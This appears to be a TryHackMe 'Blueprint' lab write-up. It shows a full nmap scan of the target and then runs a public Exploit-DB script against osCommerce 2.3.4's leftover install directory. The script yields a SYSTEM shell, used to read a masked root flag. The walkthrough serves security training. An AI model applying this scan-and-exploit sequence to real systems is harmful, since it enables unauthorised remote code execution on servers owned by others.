3 minutes
THM: Blueprint
Title:Blueprint
Description:Hack into this Windows machine and escalate your privileges to Administrator.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.179.12 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-13 08:24 BST
Stats: 0:11:53 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 59.31% done; ETC: 08:44 (0:08:09 remaining)
Nmap scan report for 10.10.179.12
Host is up (0.18s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: 404 - File or directory not found.
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_ssl-date: TLS randomness does not represent time
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-title: Index of /
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
|_http-title: Index of /
| http-methods:
|_ Potentially risky methods: TRACE
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -20m18s, deviation: 34m38s, median: -18s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: BLUEPRINT
| NetBIOS computer name: BLUEPRINT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-08-13T08:45:22+01:00
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:f6:b5:fd:8f:29 (unknown)
| smb2-time:
| date: 2025-08-13T07:45:24
|_ start_date: 2025-08-13T07:07:38
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1303.54 seconds
Website (8080)
Based on the nmap results osCommerce is running and the version number is included as part of the subdirectory, oscommerce-2.3.4/. Looking on exploitdb we see a number of exploits exist and several of them are reliant on the install directory. Checking in our browser we can see that it is still there.
We pick an exploit and run and get a shell back as system. Then it is just a case of getting the flag from the administrator account.
# python3 50128.py http://10.10.179.12:8080/oscommerce-2.3.4/catalog/
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system
RCE_SHELL$ dir ..\..\..\..\..\..\..\..\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 14AF-C52C
Directory of C:\Users\Administrator\Desktop
11/27/2019 07:15 PM <DIR> .
11/27/2019 07:15 PM <DIR> ..
11/27/2019 07:15 PM 37 root.txt.txt
1 File(s) 37 bytes
2 Dir(s) 19,509,260,288 bytes free
RCE_SHELL$ type C:\Users\Administrator\Desktop\root.txt.txt
THM{ae****************************ee}